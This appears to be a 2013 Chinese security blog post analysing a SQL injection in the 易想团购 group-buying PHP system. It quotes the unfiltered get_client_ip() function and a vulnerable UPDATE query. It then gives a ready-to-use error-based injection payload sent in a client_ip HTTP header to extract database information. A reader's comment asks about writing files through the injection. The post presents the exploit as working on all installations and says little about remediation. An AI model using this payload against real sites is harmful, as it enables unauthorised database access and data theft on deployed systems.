易想团购

易想团购
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
易想团购系统通杀SQL注入漏洞分析及利用 Seay认证作者2013-04-10共149079人围观 ，发现 1 个不明物体 WEB安全
刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章，看他贴的代码里面有个get_client_ip()函数，哈哈，我猜没过滤，果断下了一套程序。

找到get_client_ip()函数：

// 获取客户端IP地址
function get_client_ip(){
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
果然没过滤，看了下很多地方用到这个函数。

比如：

if($_REQUEST['act'] == 'verify')
{
$id = intval($_REQUEST['id']);
$user_info = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);
if(!$user_info)
{
showErr($GLOBALS['lang']['NO_THIS_USER']);
}
$verify = $_REQUEST['code'];
if($user_info['verify'] == $verify)
{
//成功
$_SESSION['user_info'] = $user_info;
$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");
$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");
showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");
}
团购系统嘛，其实不用看代码，登陆的这些地方必定会用这个函数。

果断的，登陆的时候在http头里面加了个client_ip，值为127′

看图：

报错注入，很简单吧，

exp：

火狐插件增加client_ip头部，对应值为

‘ and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架，回头看看有没有代码执行。

感谢Seay投递

Seay
Seay
14 篇文章
等级： 4级
||
上一篇：短信炸弹—用Python模拟ajax请求下一篇：[APT专题]中国黑客利用Twitter进行APT攻击
发表评论已有 1 条评论

administrator 2013-04-10回复 1楼
update注射有办法 outfile么？

亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我
Seay
Seay认证作者

安全宝安全工程师

14
文章数
17
评论数
最近文章
代码审计思路之实例解说全文通读
2015.11.26

移动APP安全在渗透测试中的应用
2014.03.21

北京星云融创（安全宝）2014年招聘安全服务工程及实习生
2014.02.25

浏览更多
相关阅读
nginx爆整数溢出漏洞最新情况(2013-04-29)关于PHP代码审计和漏洞挖掘的一点思考阿里巴巴招聘红蓝对抗方向安全专家CVE-2013-3918漏洞分析及分析流程翻译Joomla!3.7.0 SQL注入攻击漏洞分析
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank